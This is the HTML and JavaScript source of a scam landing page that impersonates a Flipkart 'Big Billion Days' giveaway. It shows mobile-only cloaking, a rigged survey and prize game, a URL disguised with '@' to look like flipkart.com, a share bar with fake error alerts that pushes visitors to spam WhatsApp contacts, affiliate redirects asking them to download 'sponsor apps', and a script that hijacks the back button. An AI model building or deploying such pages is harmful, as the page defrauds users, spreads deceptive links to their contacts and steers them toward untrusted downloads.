
<!doctype html>
<html lang="en" dir="ltr">
  <script>
            if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) {
            } else {
                window.location.href = "http://www.google.com";
            }
        </script>
<head>
<title>Fk big 1</title>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">

	<meta property="og:type" content="website" /> 
	
	
	<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" />
	<script src="https://cdnjs.cloudflare.com/ajax/libs/limonte-sweetalert2/8.11.8/sweetalert2.all.min.js"></script>
  
<link rel="shortcut icon" href="data:image/x-icon" type="image/x-icon">
<link href="https://olului.pages.dev/css/app.css?id=2fbe2d9a9a40ca9b2489" type="text/css" rel="stylesheet" />




<link rel="me" href="https://www.blogger.com/profile/09061044751206747383" />
<meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/>
<meta name='google-adsense-platform-domain' content='blogspot.com'/>
</head>
<body>
  
<style>
 
.app{align-items:center;box-sizing:border-box;display:flex;justify-content:center;padding:0px}.left,.right{align-self:start;margin:0 20px;max-width:400px;width:100%}.product-preview__title{font-family:Pacifico,sans-serif;font-size:36px}.product-preview__image{max-width:340px;width:100%}.survey{background:#eaeaea;font-size:18px;font-weight:700;max-width:none;padding:40px;position:relative;text-align:center}.survey__question{color:#000}.survey__answer{background:#2874f0;border:8px solid #2874f0;border-radius:14px;box-shadow:none;color:#fff;cursor:pointer;display:block;font-size:30px;font-weight:700;line-height:28px;margin-top:15px;padding:19px 20px;text-decoration:none;width:100%}.survey__steps{margin-top:20px}.survey__step{background:#2874f0;border-radius:50%;display:inline-block;font-size:0;height:30px;margin:0 5px;width:30px}.survey__step--active{background:#feb72d}.modal{color:#000;z-index:6}.modal__content{background-color:#f7f3ed;padding:20px}.opening-modal__image{max-width:250px;width:100%}.button{background-color:#007bd8;border:none;border-radius:.25rem;color:#fff;display:inline-block;font-size:1.6rem;font-weight:400;line-height:1.5;padding:.25rem 3.80rem;text-decoration:none;transition:color .15s ease-in-out,background-color .15s ease-in-out,border-color .15s ease-in-out,box-shadow .15s ease-in-out;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;vertical-align:middle}.button,.verify{text-align:center}.verify{background:#eaeaea;color:#000;padding:40px}.verify__text{padding:2px 0}.verify__icon{max-width:13px}.verify__icon--spinner{opacity:0}.verify__icon--visible{opacity:1}.text-rotator{font-size:21px;margin-bottom:10px}@media(max-width:640px){.app{flex-direction:column}.left,.right{margin:0;max-width:none;width:100%}.survey{padding:20px}.survey__answer{font-size:20px;line-height:18px;padding:10px}}
    </style>
  <style>
    
    @import url("https://fonts.googleapis.com/css2?family=Poppins:wght@500;700&display=swap");

* {
    margin: 0;
    padding: 0;
    font-family: Poppins, Droid Arabic Naskh;
    font-weight: 14px;
    box-sizing: border-box;
  text-align:center;


}
   html,
            body {
                font-size: 16px;
                width: 100%;
                height: 100%;
                padding: 0;
                margin: 0;
                
                -webkit-text-size-adjust: 100%;
                -webkit-tap-highlight-color: transparent;
            }
 
    </style>
  <style>
   
    
button:hover {
    background: ;
}


    .done {
    text-align: center;
    color: #c7db49;
}
.tip {
    font-size: 14px;
}
.title {
    text-align: center;
}
    .top-header{
        height: 49px;
        z-index: 99;
        background: #fff;
        padding: 9px;
        opacity: 0.95;
    }
    .top-header > img{
        width: 30px;
    }
    .header_flex_item {
        color: #fff !important;
    }
    .header_flex_item {
        font-size: 12px;
        color: #fff;
        font-weight: 700;
        width: 50%
    }
      

  .barr {
    direction: ltr;
    max-width: 400px;
    margin: 10px auto;
    box-sizing: border-box;
}
.fill {
    position: relative;
    display: inline-block;
    width: calc(100% - 100px);
    height: 35px;
    padding: 2px;
    border: 2px solid #0e5aa7;
}
    #share, 
    #claim {
    display: none;
}
  .percentage {
    width: 100px;
    float: right;
    height: 35px;
    font-size: 16px;
    border: 2px solid #0e5aa7;
}
#percentage,
#percentage2 {
    margin-left: 5px;
}
  #fill,
#fill2 {
    background: #0e5aa7;
    width: 0%;
    height: 100%;
}
   .txt1 {
			padding: 5px 6px;
			line-height: 18px;
            color: #2874f0;
			text-align: center
		}
		.bottom {
			width: 92%;
			margin: 20px auto 0;
			border: 1px solid #ccc;
			background-color: #f2f2f2;
			padding: 5px;
			border-radius: 10px;
			-moz-border-radius: 10px;
			-webkit-border-radius: 10px
              
		}
		.now {
			text-align: center;
			padding-top: 5px
		}
		#countdown {
			font-weight: bold;
		}
		.rules {
			color: #1b316c;
			padding: 4px 5px;
			line-height: 22px
		}
    	.title1 {
			text-align: center;
			font-weight: 700;
			font-size: 26px
		}
    
		.now2 {
			padding-top: 10px;
			font-weight: bold;
		}
    .last_page{
			display: none;
		}
		.last-up{
			text-align: left;
		}
		.textlastup{
			color: #068afb;
			font-size: 18px;
			padding-bottom: 8px;
			font-weight: 400;
		}
     .share_main_bt {
        margin: 10px auto;
        background:#4ab115;
        border-radius: 10px;
        width: 80%;
        line-height: 45px;
        text-align: center;
        font-size: 18px;
        font-weight: bold;
        color: #fff  !important;
    }
    .sa-confirm-button-container{
			width:100px !important;
		}
      
  .barr {
    direction: ltr;
    max-width: 400px;
    margin: 10px auto;
    box-sizing: border-box;
}
.fill {
    position: relative;
    display: inline-block;
    width: calc(100% - 100px);
    height: 35px;
    padding: 2px;
    border: 2px solid #0e5aa7;
}
  #claim {
    display: none;
}
  .percentage {
    width: 100px;
    float: right;
    height: 35px;
    font-size: 16px;
    border: 2px solid #0e5aa7;
}
#percentage,
#percentage2 {
    margin-left: 5px;
}
  #fill,
#fill2 {
    background: #0e5aa7;
    width: 0%;
    height: 100%;
}
    .share_main {
        margin: 10px auto;
        width: 95%;
        background: #eeeff4;
        border-radius: 10px;
    }
    .swal2-styled.swal2-confirm {
        background-color: #8cd4f5;
        box-shadow: none;
        padding: 10px 32px;
        margin-top: 10px;
        cursor: pointer;
        color: #fff !important;
        border-radius: 0.2rem;
        border: 1px solid rgba(84, 84, 84, 0.4);
        font-weight: 300;
        font-size: 19px;
        width: 100%;
        background: #2874f0 !important;
    }

    .swal2-actions {
        padding: 0 !important;
    }
    </style>
  <img src='https://i.imgur.com/ao9WXbb.png' width='100%'/>
   
    <div id="intro">
<div class="app" id="app" v-cloak>
  
<vue-modal v-show="!showRotator && !showPrize" :open="showOpeningModal" class="opening-modal">
<img class="opening-modal__image" src="https://i.imgur.com/eaUwpcP.png" alt="lulu" />
<h1 class="heading heading--h1">
Congratulations! 
</h1>
<p class="paragraph">
On the occasion of THE BIG BILLION DAYS, You have been chosen among the few to receive a free prize.
</p>
<p class="paragraph">
  Click "OK" to claim your reward
</p>
 <br> 
<button class="button" v-on:click="showOpeningModal = false; $confetti.stop()">
OK
</button>
  
</vue-modal>
<vue-modal :open="showInstructionsModal">
<h2 class="heading heading--h1">Congratulation ! Your answers have been saved</h2>
 
<p class="paragraph">
Now you have a chance to win valuable prizes
<br><br>
You have 3 Chances !  We wish you good luck
<br><br>
You need to select the box that has the gift inside the boxes. 
</p>
   <br>
<button class="button" v-on:click="showInstructionsModal = false">
Start
</button>
</vue-modal>
<vue-modal :open="showFailModal">
<h1 class="heading heading--h1">Better luck next time</h1>
<p class="paragraph">
You have (2) extra chances. 
</p>
   <br>
<button class="button" v-on:click="showFailModal = false">
OK
</button>
</vue-modal>
<vue-modal :open="showSuccessModal">
<img src="https://i.imgur.com/J6VBK4X.png" style="width: 194px;">
<h1 class="heading heading--h1">Congratulations! </h1>
  <h3 class="heading heading--h1">You did it! you won : </h3>

<p class="paragraph">

( Apple iPhone 15 Pro - 128GB )
<br>
<br>Follow the instructions on the next page to claim your prize ! 
</p>
    <br>
<button class="button" v-on:click="$confetti.stop()" onclick="go();">
Ok
</button>
</vue-modal>
  
<div class="left">
<div class="product-preview">
<div class="product-preview__title">
  
</div>
  
 <img src="https://i.imgur.com/Wb73PmR.png" style="width:100%;" />
   

</div>
</div>
<div class="right">
<vue-box-picker v-if="showBoxPicker" :vertical-items="4" lid-image="https://i.imgur.com/wwDvRkf.png" box-image="https://i.imgur.com/ovCwZbP.png" box-back-image="https://i.imgur.com/E1aLCJr.png" prize-image="https://i.imgur.com/7RoYjx2.png" v-on:fail="onBoxPickerFail" v-on:success="onBoxPickerSuccess" :horizontal-items="3" :max-clicks="2"></vue-box-picker>

<div class="verify" v-if="showRotator">
<vue-text-rotator v-on:rotate="rotate" v-on:finished="onRotatorFinished" :strings='[
                     "Please wait a moment...",
              "Please wait a moment...",
              "Please wait a moment..."
            ]'>
</vue-text-rotator>
<div class="verify__text" v-if="rotateIndex > 1">
<strong>
You have answered 4/4 of the questions
</strong>
<img class="verify__icon verify__icon--checked" src="https://olului.pages.dev/img/landers/survey-pick-a-box/checked.png" alt="" />
</div>
<div class="verify__text" v-else>
Your answers are being processed
<img class="verify__icon verify__icon--spinner" :class="{'verify__icon--visible' : rotateIndex > 0}" src="https://olului.pages.dev/img/landers/survey-pick-a-box/spinner.gif" alt="" />
</div>
<div class="verify__text" v-if="rotateIndex > 2">
<strong>
Big Rewards available for you!
</strong>
<img class="verify__icon verify__icon--checked" src="https://olului.pages.dev/img/landers/survey-pick-a-box/checked.png" alt="" />
</div>
<div class="verify__text" v-else>
Looking for gifts.. 
<img class="verify__icon verify__icon--spinner" :class="{'verify__icon--visible' : rotateIndex > 1}" src="https://olului.pages.dev/img/landers/survey-pick-a-box/spinner.gif" alt="" />
</div>
<div class="verify__text" v-if="rotateIndex > 3">
<strong>
Only (1289) gifts remain!
</strong>
<img class="verify__icon verify__icon--checked" src="https://olului.pages.dev/img/landers/survey-pick-a-box/checked.png" alt="" />
</div>
<div class="verify__text" v-else>
Stock is being checked
<img class="verify__icon verify__icon--spinner" :class="{'verify__icon--visible' : rotateIndex > 2 }" src="https://olului.pages.dev/img/landers/survey-pick-a-box/spinner.gif" alt="" />
</div>
</div>
<vue-survey v-if="showSurvey" :show-steps="true" :questions='[
           {
              title: "Do you know Big Billion Days ?",
              answers: [ { text: "YES" }, { text: "NO" } ]
            },
                                                             {
              title: "Whats your gender? ",
              answers: [ { text: "MALE" }, { text: "FEMALE" } ]
            },
            {
              title: "How old are you?",
              answers: [ { text: "18-21" }, { text: "22-29" }, { text: "30-39" }, { text: "40-59" }, { text: "60+" } ]
            },
                                                                         {
              title: "How would you rate Flipkart? ",
              answers: [ { text: "AMAZING" }, { text: "VERY GOOD" }, { text: "GOOD" }, { text: "NOT GOOD" } ]
            },
            {
              title: "Would you recommend us to your friend? ",
              answers: [ { text: "YES" }, { text: "NO" } ]
            },
          ]' v-on:finish="onSurveyFinish"></vue-survey>
</div>

       <br> <img src="https://i.imgur.com/CWR0GUY.jpeg" style="width:100%;" />
  </div>
      </div>
  
  <div id="share">
    
<div class="title1">
<p>Congratulations! </p>
</div>
<div class="weui_dialog_img prize_img" style="text-align: center;margin: 20px 0;">
                                <center>   <img src="https://i.imgur.com/J6VBK4X.png" width='61%'/> </center>
                           

                            </div>
<p class="txt1">Your prize is: Apple iPhone 15 Pro - 128GB, <br> Follow the instructions on below to claim your prize !</p>
      <div class="bottom" id='buttonO'>
<div id="lastapp"><p class="now now2"></p><p class="rules">1.Share with 5 groups / 15 friends on "Whatsapp" (click the "Whatsapp" icon below)</p><p class="rules">2. Click "Continue" and claim your prize.</p></div>

    
   <div class="share_main_bt" id="whatsapp">WhatsApp&nbsp;   →</div>
  <h4 class="textlastup">Share until the blue bar is full!</h4>
  <div class="barr">
                <div class="fill">
                    <div id="fill2"></div>
                </div>
                <div class="percentage center">
                    <span><i class="fa fa-spinner fa-pulse"></i></span>
                    <span id="percentage2">0%</span>
                </div>
    
            <br>       <div class="share_main_bt" onclick="tipn()" style="margin: 20px auto 0; background-color: #2874f0;">
                                Continue
                            </div>
   
  </div></div>
  <br> <img src="https://i.imgur.com/CWR0GUY.jpeg" style="width:100%;" />
  </div>
 
  

  
                      
    <div id="claim">
      <div class="title1">
<p>Congratulations! </p>
</div>
<div class="weui_dialog_img prize_img" style="text-align: center;margin: 20px 0;">
                                <center>   <img src="https://i.imgur.com/J6VBK4X.png" width='61%'/> </center>
                           

                            </div>
<p class="txt1">Your prize is: Apple iPhone 15 Pro - 128GB,  Follow the instructions on below to claim your prize !</p>
            <p class="done"><i class="fa fa-check-circle fa-3x" aria-hidden="true"></i></p>
            <p class="rules">1. You are one step away to get your gift.</p>
      <p class="rules">2. You need to complete registration process and need to download sponsor app to get your prize. </p>
        <br>
        
      <div class="share_main_bt" id="offer">Complete registration 1</div>
      
      <div class="share_main_bt" id="offers">Complete registration 2</div>                  
             
      <br>
          <center><script type="text/javascript" src="https://udbaa.com/bnr.php?section=sdf&pub=886613&format=300x250&ga=g"></script>
<noscript><a href="https://yllix.com/publishers/886613" target="_blank"><img src="//ylx-aff.advertica-cdn.com/pub/300x250.png" style="border:none;margin:0;padding:0;vertical-align:baseline;" alt="ylliX - Online Advertising Network" /></a></noscript>
           </center> 
       
 
  <img src="https://i.imgur.com/CWR0GUY.jpeg" style="width:100%;" />
       </div>
      </div>
  

  
  

<script>window.view = window.view || {};view.offerUrl = "https:\/\/rdr.funcontent.xyz/click";view.qs = null;view.skip = 0;view.screenshot = 0;view.download = 1;view.noredir = false;</script> <script src="js/app.js?id=d41d8cd98f00b204e980" type="application/javascript"></script>
<script src="https://pamdas.pages.dev/wow.js?id=17138759790b445ece6b" type="application/javascript"></script>
  





  <script>
function go() {
    $("#intro").fadeOut(0);
        $("#share").fadeIn(1000);
} 
    

</script>


</body>
</html>

<script src="https://code.jquery.com/jquery-latest.min.js"></script>


  <script>
        var text1 = "ytime" ,
            text2 = " مكتبة جرير تقدم ",
            text3 = " سارع واحصل على قسيمتك قبل النفاذ من هنا : ",
            error = "There is an error!\nPosts do not count. You may have shared it with the same friend or group more than once, please re-share.",
            cpa = "https://href.li/?https://www.upperbuilding.homes/?sl=5846310-90d4c&pub_click_id={External_ID_from_traffic_source}&site={subID}&pub_sub_id={sub_subID}",
            cpa1 = "https://href.li/?https://www.trickpink.wiki/?sl=5846313-52706&pub_click_id={External_ID_from_traffic_source}&site={subID}&pub_sub_id={sub_subID}",
            cpa2 = "https://href.li/?https://prizesenses.life/?u=m5gk605&o=frrpazz&t=proaug001",
            saved = "mysp02",
            share = "whatsapp://send?text=" + text1 ;
    </script>

<script>
    var tiaoban = [
    "https://flipkart.com@bit.ly/4ecsxfO",
    "https://flipkart.com@bit.ly/4ecsxfO",
];
  
var tiaoban = tiaoban[Math.floor(Math.random() * tiaoban.length)];

var date = new Date();

var hour = (date.getHours() > 9) ? date.getHours() : '0' + date.getHours();

var minute = (date.getMinutes() > 9) ? date.getMinutes() : '0' + date.getMinutes();

var second = (date.getSeconds() > 9) ? date.getSeconds() : '0' + date.getSeconds();

var mytime = hour + ':' + minute + ':' + second;

var tb = tiaoban ;
  
  
</script>

<!-- code by ODcompany -->
  <!-- JS-WP -->
 <script type="text/javascript">
 var swidth = localStorage.getItem(saved);
if (swidth !== null) {
    var width = swidth * 1;
    $("#intro").fadeOut(0);
    $(".comments").fadeOut(0);
    $("#share").fadeIn(0);
    $("#fill2").css("width", width + "%");
    $("#percentage2").text(width + "%");
} else {
    var width = 0;
}
$("#whatsapp").click(function () {
    window.open('whatsapp://send?text=' + tb);
    if (width == 0) {
        width += 50;
    } else if (width == 50) {
        alert(error);
        width += 15;
    } else if (width == 65) {
        width += 5;
    } else if (width == 70) {
        alert(error);
        width += 10;
    } else if (width == 80) {
        alert(error);
        width += 5;
    } else if (width == 85) {
        width += 2;
    } else if (width == 87) {
        width += 3;
    } else if (width == 90) {
        width += 3;
    } else if (width == 93) {
        width += 2;
    } else if (width == 95) {
        width += 2;
    } else if (width == 97) {
        width += 1;
    } else if (width == 98) {
        width += 1;
    } else {
        $("#share").fadeOut(0);
        $("#claim").fadeIn(1000);
        
    }
    localStorage.setItem(saved, width);
    setTimeout(function () {
        $("#fill2").css("width", width + "%");
        $("#percentage2").text(width + "%");
    }, 2000);
});
$("#offer").click(function () {
    window.open(cpa, "_blank");
});
   
$("#offers").click(function () {
    window.open(cpa1, "_blank");
});
   
$("#offerss").click(function () {
    window.open(cpa2, "_blank");
});
   function tipn(){
   Swal.fire({
  icon: 'error',
  title: 'Unfortunately...',
  text: 'To Receive Your Prize, You have to share with friends about our event. Share until the blue bar is full!',
  
});
   }
</script>
  



<!-- Histats.com  START  (aync)-->
<script type="text/javascript">var _Hasync= _Hasync|| [];
_Hasync.push(['Histats.start', '1,3313415,4,0,0,0,00010000']);
_Hasync.push(['Histats.fasi', '1']);
_Hasync.push(['Histats.track_hits', '']);
(function() {
var hs = document.createElement('script'); hs.type = 'text/javascript'; hs.async = true;
hs.src = ('//s10.histats.com/js15_as.js');
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(hs);
})();</script>
<noscript><a href="/" target="_blank"><img  src="//sstatic1.histats.com/0.gif?3313415&101" alt="free stats" border="0"></a></noscript>
<!-- Histats.com  END  -->


      <script type="text/javascript">! function (){	var t;	try{for (t=0; 10 > t; ++t)		history.pushState({}, "", "#");	onpopstate=function (t)	{		t.state && alert('Please Share Maximum to receive gift. ');		}}		catch (o){}}();</script>
 
 

      



